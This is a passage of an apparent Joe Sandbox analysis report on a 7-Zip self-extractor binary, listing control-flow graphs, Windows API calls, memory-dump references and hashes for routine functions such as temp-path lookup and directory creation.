                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,004017CF,?), ref: 00403809
                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000001,0000000C,004017CF,004017CF,?,?,?,?,004017CF,?), ref: 0040384F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: ??3@$FileTime$??2@AttributesSystemlstrlenmemcpy
                                                      • String ID:
                                                      • API String ID: 846840743-0
                                                      • Opcode ID: c6cac6823dad6bcefe5525f74f9ffb8c6f410304bbed9cd84b72b707b4a92466
                                                      • Instruction ID: 91e79cb9f272e0fc84db3cde8408d575c4b848c544f3ea2b05d11415b181eedc
                                                      • Opcode Fuzzy Hash: c6cac6823dad6bcefe5525f74f9ffb8c6f410304bbed9cd84b72b707b4a92466
                                                      • Instruction Fuzzy Hash: 0841B6B6900211A6DB20BF598845BBFBABCEF41706F50813BF941B32C5D77C9A4282DD

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 905 40f227-40f26f _EH_prolog call 40ef4a 908 40f271-40f274 905->908 909 40f277-40f27a 905->909 908->909 910 40f290-40f2b5 909->910 911 40f27c-40f281 909->911 914 40f2b7-40f2bd 910->914 912 40f283-40f285 911->912 913 40f289-40f28b 911->913 912->913 915 40f6f3-40f704 913->915 916 40f2c3-40f2c7 914->916 917 40f387-40f39a call 4011d1 914->917 918 40f2c9-40f2cc 916->918 919 40f2cf-40f2de 916->919 925 40f3b1-40f3d6 call 40e891 ??2@YAPAXI@Z 917->925 926 40f39c-40f3a6 call 40ef85 917->926 918->919 921 40f2e0-40f2f6 call 40f040 call 40f1fd call 40ce5c 919->921 922 40f303-40f308 919->922 942 40f2fb-40f301 921->942 923 40f316-40f350 call 40f040 call 40f1fd call 40ce5c call 40f117 922->923 924 40f30a-40f314 922->924 928 40f353-40f369 923->928 924->923 924->928 939 40f3e1-40f3fa call 40ef4a call 40dc14 925->939 940 40f3d8-40f3df call 40dce7 925->940 948 40f3aa-40f3ac 926->948 936 40f36c-40f374 928->936 941 40f376-40f385 call 40ef63 936->941 936->942 958 40f3fd-40f420 call 40dc09 939->958 940->939 941->936 942->914 948->915 962 40f422-40f427 958->962 963 40f456-40f459 958->963 966 40f429-40f42b 962->966 967 40f42f-40f447 call 40f090 call 40ef85 962->967 964 40f485-40f4a9 ??2@YAPAXI@Z 963->964 965 40f45b-40f460 963->965 971 40f4b4 964->971 972 40f4ab-40f4b2 call 40f776 964->972 968 40f462-40f464 965->968 969 40f468-40f47e call 40f090 call 40ef85 965->969 966->967 984 40f449-40f44b 967->984 985 40f44f-40f451 967->985 968->969 969->964 973 40f4b6-40f4cd call 40ef4a 971->973 972->973 986 40f4db-40f500 call 40faff 973->986 987 40f4cf-40f4d8 973->987 984->985 985->915 991 40f502-40f507 986->991 992 40f543-40f546 986->992 987->986 995 40f509-40f50b 991->995 996 40f50f-40f514 991->996 993 40f54c-40f5a9 call 40f163 call 40f011 call 40e9ef 992->993 994 40f6ae-40f6b3 992->994 1012 40f5ae-40f5b3 993->1012 997 40f6b5-40f6b6 994->997 998 40f6bb-40f6df 994->998 995->996 1000 40f516-40f518 996->1000 1001 40f51c-40f534 call 40f090 call 40ef85 996->1001 997->998 998->915 998->958 1000->1001 1010 40f536-40f538 1001->1010 1011 40f53c-40f53e 1001->1011 1010->1011 1011->915 1013 40f615-40f61b 1012->1013 1014 40f5b5 1012->1014 1016 40f621-40f623 1013->1016 1017 40f61d-40f61f 1013->1017 1015 40f5b7 1014->1015 1018 40f5ba-40f5c3 call 40faac 1015->1018 1019 40f5c5-40f5c7 1016->1019 1020 40f625-40f631 1016->1020 1017->1015 1018->1019 1030 40f602-40f604 1018->1030 1022 40f5c9-40f5ca 1019->1022 1023 40f5cf-40f5d1 1019->1023 1024 40f633-40f635 1020->1024 1025 40f637-40f63d 1020->1025 1022->1023 1027 40f5d3-40f5d5 1023->1027 1028 40f5d9-40f5f1 call 40f090 call 40ef85 1023->1028 1024->1018 1025->998 1029 40f63f-40f645 1025->1029 1027->1028 1028->948 1038 40f5f7-40f5fd 1028->1038 1029->998 1032 40f606-40f608 1030->1032 1033 40f60c-40f610 1030->1033 1032->1033 1033->998 1038->948
                                                      APIs
                                                      • _EH_prolog.MSVCRT ref: 0040F230
                                                      • ??2@YAPAXI@Z.MSVCRT(00000038,00000001), ref: 0040F3CE
                                                      • ??2@YAPAXI@Z.MSVCRT(00000038,00000000,00000001), ref: 0040F4A1
                                                        • Part of subcall function 0040F776: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,?,0040F4B2,00000000,00000001), ref: 0040F79E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: ??2@$H_prolog
                                                      • String ID: pmA${D@
                                                      • API String ID: 3431946709-901781089
                                                      • Opcode ID: 5f2616ad24b74ab3b3c53048b37fa2c0e98c535542d0e7834049dc9cf8634cb0
                                                      • Instruction ID: 4b0d62aee0caa64fe906b0c8bb83bc11348460c21612f4a75cf9423b72749376
                                                      • Opcode Fuzzy Hash: 5f2616ad24b74ab3b3c53048b37fa2c0e98c535542d0e7834049dc9cf8634cb0
                                                      • Instruction Fuzzy Hash: 27F14971600209DFCB24DF65C884AAA77E5BF48314F24417AFC15AB7A2DB39EC4ACB54

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1041 401b75-401b84 CreateDirectoryW 1042 401bb6-401bba 1041->1042 1043 401b86-401b93 GetLastError 1041->1043 1044 401ba0-401bad GetFileAttributesW 1043->1044 1045 401b95 1043->1045 1044->1042 1047 401baf-401bb1 1044->1047 1046 401b96-401b9f SetLastError 1045->1046 1047->1042 1048 401bb3-401bb4 1047->1048 1048->1046
                                                      APIs
                                                      • CreateDirectoryW.KERNELBASE(k7@,00000000,-00000001,0040376B,?,004017CF,?,?,?,?,004017CF,?), ref: 00401B7C
                                                      • GetLastError.KERNEL32(?,?,?,?,004017CF,?), ref: 00401B86
                                                      • SetLastError.KERNEL32(000000B7,?,?,?,?,004017CF,?), ref: 00401B96
                                                      • GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 00401BA4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$AttributesCreateDirectoryFile
                                                      • String ID: k7@
                                                      • API String ID: 635176117-1561861239
                                                      • Opcode ID: 7fa23999d3db3281292cd00d2626ae9ff6d2ad14d17e5580772b07dc82ab3e50
                                                      • Instruction ID: 71014ff69d247b10dec1bc4f18777740662f48cc5fd99e7c756ec1d8f22ae331
                                                      • Opcode Fuzzy Hash: 7fa23999d3db3281292cd00d2626ae9ff6d2ad14d17e5580772b07dc82ab3e50
                                                      • Instruction Fuzzy Hash: 72E04831918510EFDB125B34FC48BDF7B659F85365F908672F459E01F4E3749C428549

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1052 40e9ef-40ea0a call 410a40 1055 40ea19-40ea52 call 406eb0 call 40f707 1052->1055 1056 40ea0c-40ea16 1052->1056 1061 40eb20-40eb46 call 40e79c call 40e6d7 1055->1061 1062 40ea58-40ea62 ??2@YAPAXI@Z 1055->1062 1074 40eb64-40eb7c call 40cdda call 401132 1061->1074 1075 40eb48-40eb5e call 40e2e8 1061->1075 1064 40ea71 1062->1064 1065 40ea64-40ea6f 1062->1065 1066 40ea73-40eaac call 40ef4a ??2@YAPAXI@Z 1064->1066 1065->1066 1072 40eabe 1066->1072 1073 40eaae-40eabc 1066->1073 1076 40eac0-40eaf9 call 40ef4a call 40c350 call 40e45f 1072->1076 1073->1076 1089 40ebb4-40ebc4 1074->1089 1090 40eb7e-40eb8b ??2@YAPAXI@Z 1074->1090 1075->1074 1083 40ece0-40ecf7 1075->1083 1105 40eb01-40eb06 1076->1105 1106 40eafb-40eafd 1076->1106 1094 40ee93-40eeae call 40e27a 1083->1094 1095 40ecfd 1083->1095 1107 40ebf4-40ebfa 1089->1107 1108 40ebc6 1089->1108 1091 40eb96 1090->1091 1092 40eb8d-40eb94 call 40e7c1 1090->1092 1097 40eb98-40eba8 call 40f707 1091->1097 1092->1097 1111 40eeb0-40eeb6 1094->1111 1112 40eeb9-40eebc 1094->1112 1101 40ed00-40ed30 1095->1101 1120 40ebaa-40ebad 1097->1120 1121 40ebaf 1097->1121 1118 40ed60-40eda6 call 40cd11 * 2 1101->1118 1119 40ed32-40ed38 1101->1119 1116 40eb08-40eb0a 1105->1116 1117 40eb0e-40eb1a 1105->1117 1106->1105 1113 40ec00-40ec20 call 40cf2f 1107->1113 1114 40ecce-40ecdd call 40e977 1107->1114 1115 40ebc8-40ebee call 40ce5c call 40e2c5 call 40e42c call 40e4dd 1108->1115 1111->1112 1112->1115 1123 40eec2-40eee9 call 40cd11 1112->1123 1133 40ec25-40ec2d 1113->1133 1114->1083 1115->1107 1116->1117 1117->1061 1117->1062 1163 40ee10 1118->1163 1164 40eda8-40edab 1118->1164 1127 40ee00-40ee02 1119->1127 1128 40ed3e-40ed50 1119->1128 1129 40ebb1 1120->1129 1121->1129 1145 40ef01-40ef1d 1123->1145 1146 40eeeb-40eeff call 4107a2 1123->1146 1139 40ee06-40ee0b 1127->1139 1150 40ed56-40ed58 1128->1150 1151 40edda-40eddc 1128->1151 1129->1089 1137 40ec33-40ec3a 1133->1137 1138 40edca-40edcf 1133->1138 1147 40ec68-40ec6b 1137->1147 1148 40ec3c-40ec40 1137->1148 1141 40edd1-40edd3 1138->1141 1142 40edd7 1138->1142 1139->1115 1141->1142 1142->1151 1217 40ef1e call 40bb40 1145->1217 1218 40ef1e call 40c5e0 1145->1218 1219 40ef1e call 40e17a 1145->1219 1220 40ef1e call 41297c 1145->1220 1146->1145 1152 40ec71-40ec7f call 40f707 1147->1152 1153 40edf9-40edfe 1147->1153 1148->1147 1156 40ec42-40ec45 1148->1156 1150->1118 1159 40ed5a-40ed5c 1150->1159 1160 40ede4-40ede7 1151->1160 1161 40edde-40ede0 1151->1161 1180 40ec81-40ec87 call 413226 1152->1180 1181 40ec8c-40ec9d call 40e45f 1152->1181 1153->1127 1153->1139 1166 40ec4b-40ec59 call 40f707 1156->1166 1167 40edec-40edf1 1156->1167 1157 40ef21-40ef2b call 40ce5c 1157->1115 1159->1118 1160->1115 1161->1160 1169 40ee13-40ee19 1163->1169 1174 40edae-40edc6 call 4107a2 1164->1174 1166->1181 1184 40ec5b-40ec66 call 413201 1166->1184 1167->1139 1173 40edf3-40edf5 1167->1173 1176 40ee64-40ee8d call 40ce5c * 2 1169->1176 1177 40ee1b-40ee27 call 40e558 1169->1177 1173->1153 1189 40edc8 1174->1189 1176->1094 1176->1101 1195 40ee35-40ee41 call 40e5a3 1177->1195 1196 40ee29-40ee33 1177->1196 1180->1181 1197 40eca5-40ecaa 1181->1197 1198 40ec9f-40eca1 1181->1198 1184->1181 1189->1169 1210 40ef30-40ef45 call 40ce5c * 2 1195->1210 1211 40ee47 1195->1211 1202 40ee4a-40ee62 call 4107a2 1196->1202 1199 40ecb2-40ecb7 1197->1199 1200 40ecac-40ecae 1197->1200 1198->1197 1205 40ecb9-40ecbb 1199->1205 1206 40ecbf-40ecc8 1199->1206 1200->1199 1202->1176 1202->1177 1205->1206 1206->1113 1206->1114 1210->1115 1211->1202 1217->1157 1218->1157 1219->1157 1220->1157
                                                      APIs
                                                      • ??2@YAPAXI@Z.MSVCRT(00000018,00000000,?,00000000,?), ref: 0040EA5A
                                                      • ??2@YAPAXI@Z.MSVCRT(00000028,00000000,00000000,?,00000000,?), ref: 0040EAA4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: ??2@
                                                      • String ID: DmA${D@
                                                      • API String ID: 1033339047-1777112864
                                                      • Opcode ID: 0fbc1e047aa24a6cf396f6002696145173c8f9cc79442394acc3b55e615792f3
                                                      • Instruction ID: 6b6f199f6b2a7d9dc60afa7eeb36d7837fa60508d4a378e5edde095099593778
                                                      • Opcode Fuzzy Hash: 0fbc1e047aa24a6cf396f6002696145173c8f9cc79442394acc3b55e615792f3
                                                      • Instruction Fuzzy Hash: 0E120371900249DFCB24DF66C88099ABBB5FF08304B14496EF91AA7391DB39E995CF84

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1221 410ccb-410ce8 call 40e0d0 1224 410e20-410e23 1221->1224 1225 410cee-410cf5 call 41076b 1221->1225 1228 410cf7-410cf9 1225->1228 1229 410cfe-410d2d call 40e036 memcpy 1225->1229 1228->1224 1232 410d30-410d38 1229->1232 1233 410d50-410d68 1232->1233 1234 410d3a-410d48 1232->1234 1240 410d6a-410d6f 1233->1240 1241 410dcf 1233->1241 1235 410dc4-410dcd ??3@YAXPAX@Z 1234->1235 1236 410d4a 1234->1236 1238 410e1e-410e1f 1235->1238 1236->1233 1237 410d4c-410d4e 1236->1237 1237->1233 1237->1235 1238->1224 1243 410d71-410d79 1240->1243 1244 410dd4-410dd7 1240->1244 1242 410dd1-410dd2 1241->1242 1245 410e17-410e1c ??3@YAXPAX@Z 1242->1245 1246 410d7b 1243->1246 1247 410dad-410dbf memmove 1243->1247 1244->1242 1245->1238 1248 410d8a-410d8e 1246->1248 1247->1232 1249 410d90-410d92 1248->1249 1250 410d82-410d84 1248->1250 1249->1247 1252 410d94-410d9d call 41076b 1249->1252 1250->1247 1251 410d86-410d87 1250->1251 1251->1248 1255 410dd9-410e0f memcpy call 40d041 1252->1255 1256 410d9f-410dab 1252->1256 1258 410e12-410e15 1255->1258 1256->1247 1257 410d7d-410d80 1256->1257 1257->1248 1258->1245
                                                      APIs
                                                      • memcpy.MSVCRT(00000000,?,00000020,00010000), ref: 00410D22
                                                      • memmove.MSVCRT(00000000,?,00000020,?,00010000), ref: 00410DB9
                                                      • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00410DC5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: ??3@memcpymemmove
                                                      • String ID:
                                                      • API String ID: 3549172513-0
                                                      • Opcode ID: 8b5b25c4d5090c878f1a349e70dac13a2a131b771ee91088d389839b1187af6f
                                                      • Instruction ID: 2e51937533cdabe9fe59c05819b629b516a53c036badf135e90f0136c29b37f2
                                                      • Opcode Fuzzy Hash: 8b5b25c4d5090c878f1a349e70dac13a2a131b771ee91088d389839b1187af6f
                                                      • Instruction Fuzzy Hash: F141C171A00204ABDB24EAA5D940BFEB7B5FF84704F14446EE846A7341D7B8BEC18B59

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1273 404903-404984 #17 call 413370 call 402131 call 402187 * 7 1292 404989-40499d SHGetSpecialFolderPathW 1273->1292 1293 404a32-404a36 1292->1293 1294 4049a3-4049ed wsprintfW call 401458 * 2 call 401370 * 2 call 4032d9 1292->1294 1293->1292 1295 404a3c-404a40 1293->1295 1305 4049f2-4049f8 1294->1305 1306 404a22-404a28 1305->1306 1307 4049fa-404a1d call 401370 * 2 call 4032d9 1305->1307 1306->1305 1309 404a2a-404a2d call 40269a 1306->1309 1307->1306 1309->1293
                                                      APIs
                                                      • #17.COMCTL32(00000000,00000020,-00000002), ref: 0040490F
                                                        • Part of subcall function 00402131: GetUserDefaultUILanguage.KERNEL32(0040491F), ref: 0040213B
                                                        • Part of subcall function 00402187: GetLastError.KERNEL32(00000000,00000020,-00000002), ref: 004021D6
                                                        • Part of subcall function 00402187: wsprintfW.USER32 ref: 004021E7
                                                        • Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004021FC
                                                        • Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402201
                                                        • Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040221C
                                                        • Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000004), ref: 0040222F
                                                        • Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402236
                                                        • Part of subcall function 00402187: lstrcmpiW.KERNEL32(009B8FD0,00404926), ref: 0040224B
                                                        • Part of subcall function 00402187: ??3@YAXPAX@Z.MSVCRT(009B8FD0), ref: 0040225B
                                                        • Part of subcall function 00402187: SetLastError.KERNEL32(?), ref: 00402282
                                                        • Part of subcall function 00402187: lstrlenA.KERNEL32(00416208), ref: 004022B6
                                                        • Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004022D1
                                                        • Part of subcall function 00402187: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402303
                                                        • Part of subcall function 00402187: ??3@YAXPAX@Z.MSVCRT(00404926), ref: 00402279
                                                        • Part of subcall function 00402187: _wtol.MSVCRT ref: 00402314
                                                        • Part of subcall function 00402187: MultiByteToWideChar.KERNEL32(00000000,00416208,00000001,009B8FD0,00000002), ref: 00402334
                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000), ref: 00404995
                                                      • wsprintfW.USER32 ref: 004049B0
                                                        • Part of subcall function 004032D9: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004049F2,?,?,?), ref: 004032DE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$??2@$??3@EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLocaleMultiPathSpecialUserWide_wtollstrcmpilstrlen
                                                      • String ID: 7zSfxFolder%02d
                                                      • API String ID: 3387708999-2820892521
                                                      • Opcode ID: 0b64465946cb2e48a0dbd03d6f906f8cc659a125e1421e758d292e165e0ccb9d
                                                      • Instruction ID: 5234f5b279cb727febf32c6091b250cce28905a448a9d0e240f4fe7ebf0ff8ab
                                                      • Opcode Fuzzy Hash: 0b64465946cb2e48a0dbd03d6f906f8cc659a125e1421e758d292e165e0ccb9d
                                                      • Instruction Fuzzy Hash: 2731B471A10205ABCB10FFA1DC9AAEEB768AF40304F00417FFA15B60E1EB784946CB58

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1315 402bee-402c38 call 413660 call 40d041 lstrlenA * 2 1319 402c3d-402c59 call 40d00d 1315->1319 1321 402d29 1319->1321 1322 402c5f-402c64 1319->1322 1323 402d2b-402d2f 1321->1323 1322->1321 1324 402c6a-402c74 1322->1324 1325 402c77-402c7c 1324->1325 1326 402cbb-402cc0 1325->1326 1327 402c7e-402c83 1325->1327 1328 402ce5-402d09 memmove 1326->1328 1330 402cc2-402cd5 memcmp 1326->1330 1327->1328 1329 402c85-402c98 memcmp 1327->1329 1335 402d18-402d23 1328->1335 1336 402d0b-402d12 1328->1336 1331 402d25-402d27 1329->1331 1332 402c9e-402ca8 1329->1332 1333 402cb5-402cb9 1330->1333 1334 402cd7-402ce3 1330->1334 1331->1323 1332->1321 1337 402caa-402cb0 call 40292b 1332->1337 1333->1325 1334->1325 1335->1323 1336->1335 1338 402c3a 1336->1338 1337->1333 1338->1319
                                                      APIs
                                                      • lstrlenA.KERNEL32(?,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402C20
                                                      • lstrlenA.KERNEL32(?,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402C28
                                                      • memcmp.MSVCRT(00000000,?,?), ref: 00402C8E
                                                      • memcmp.MSVCRT(00000000,?,?,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402CCB
                                                      • memmove.MSVCRT(?,?,00000000,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402CFD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: lstrlenmemcmp$memmove
                                                      • String ID:
                                                      • API String ID: 3251180759-0
                                                      • Opcode ID: fa32a0385ddd39642fa32be0e776516a86df04650160174833642614f5e9d137
                                                      • Instruction ID: de6905f5b60a3a827beaa0a9a9e283af0395689e13c8cf078280906fc371a6c9
                                                      • Opcode Fuzzy Hash: fa32a0385ddd39642fa32be0e776516a86df04650160174833642614f5e9d137
                                                      • Instruction Fuzzy Hash: A7414972D0424DAFDB11DFA4C9889EEBBB9EF48384F14406AE845B3290D3B49E85CB55

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1342 401611-401667 call 40f707 call 401370 call 401526 CreateThread 1349 401669 call 40851f 1342->1349 1350 40166e-401689 WaitForSingleObject 1342->1350 1349->1350 1352 40168b-40168e 1350->1352 1353 4016bd-4016c3 1350->1353 1356 401690-401693 1352->1356 1357 4016b1 1352->1357 1354 401721 1353->1354 1355 4016c5-4016da GetExitCodeThread 1353->1355 1363 401726-401729 1354->1363 1358 4016e4-4016ef 1355->1358 1359 4016dc-4016de 1355->1359 1360 401695-401698 1356->1360 1361 4016ad-4016af 1356->1361 1362 4016b3-4016bb call 408dbf 1357->1362 1365 4016f1-4016f2 1358->1365 1366 4016f7-401700 1358->1366 1359->1358 1364 4016e0-4016e2 1359->1364 1367 4016a9-4016ab 1360->1367 1368 40169a-40169d 1360->1368 1361->1362 1362->1354 1364->1363 1370 4016f4-4016f5 1365->1370 1371 401702-401709 1366->1371 1372 40170b-401717 SetLastError 1366->1372 1367->1362 1373 4016a4-4016a7 1368->1373 1374 40169f-4016a2 1368->1374 1376 401719-40171e call 408dbf 1370->1376 1371->1354 1371->1372 1372->1376 1373->1370 1374->1354 1374->1373 1376->1354
                                                      APIs
                                                      • CreateThread.KERNELBASE(00000000,00000000,004012E3,00000000,00000000,?), ref: 00401655
                                                      • WaitForSingleObject.KERNEL32(000000FF,?,004017F5,?,?), ref: 00401676
                                                        • Part of subcall function 00408DBF: wvsprintfW.USER32(?,00000000,?), ref: 00408DE3
                                                        • Part of subcall function 00408DBF: GetLastError.KERNEL32 ref: 00408DF4
                                                        • Part of subcall function 00408DBF: FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,00406B79), ref: 00408E1C
                                                        • Part of subcall function 00408DBF: FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,00406B79), ref: 00408E31
                                                        • Part of subcall function 00408DBF: lstrlenW.KERNEL32(?), ref: 00408E44
                                                        • Part of subcall function 00408DBF: lstrlenW.KERNEL32(?), ref: 00408E4B
                                                        • Part of subcall function 00408DBF: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00408E60
                                                        • Part of subcall function 00408DBF: lstrcpyW.KERNEL32(00000000,?), ref: 00408E76
                                                        • Part of subcall function 00408DBF: lstrcpyW.KERNEL32(-00000002,?), ref: 00408E87
                                                        • Part of subcall function 00408DBF: ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 00408E90
                                                        • Part of subcall function 00408DBF: LocalFree.KERNEL32(?), ref: 00408E9A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: FormatMessagelstrcpylstrlen$??2@??3@CreateErrorFreeLastLocalObjectSingleThreadWaitwvsprintf
                                                      • String ID:
                                                      • API String ID: 359084233-0
                                                      • Opcode ID: 66257497e4407e65e3ec51839b2cc1af24185b4b9cde7a4118d25a0965ef4d55
                                                      • Instruction ID: 99d6c8c0394ba6fc9b9d299436d7c7a44fadaa3de81f278bf7a0439fefe7fe09
                                                      • Opcode Fuzzy Hash: 66257497e4407e65e3ec51839b2cc1af24185b4b9cde7a4118d25a0965ef4d55
                                                      • Instruction Fuzzy Hash: 0D31E131600200FBCA355B54DC95EEB36A8EB81754B28853BF515F62F0DA7A8C829A1E

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1379 404545-404576 call 401458 call 4027aa GetTempPathW 1384 404598-4045a5 1379->1384 1385 404578-404595 call 4027aa GetTempPathW call 40115e 1379->1385 1387 4045a8-4045df call 4027aa wsprintfW call 40115e GetFileAttributesW 1384->1387 1385->1384 1395 4045e1-4045eb 1387->1395 1396 4045ed-4045f3 1387->1396 1395->1387 1395->1396
                                                      APIs
                                                      • GetTempPathW.KERNEL32(00000001,00000000,00000002,00000000,00406D05,00000000,?,?,00405368,?,7ZSfx%03x.cmd), ref: 00404568
                                                      • GetTempPathW.KERNEL32(00000001,00000000,00000001,?,?,00405368,?,7ZSfx%03x.cmd), ref: 00404585
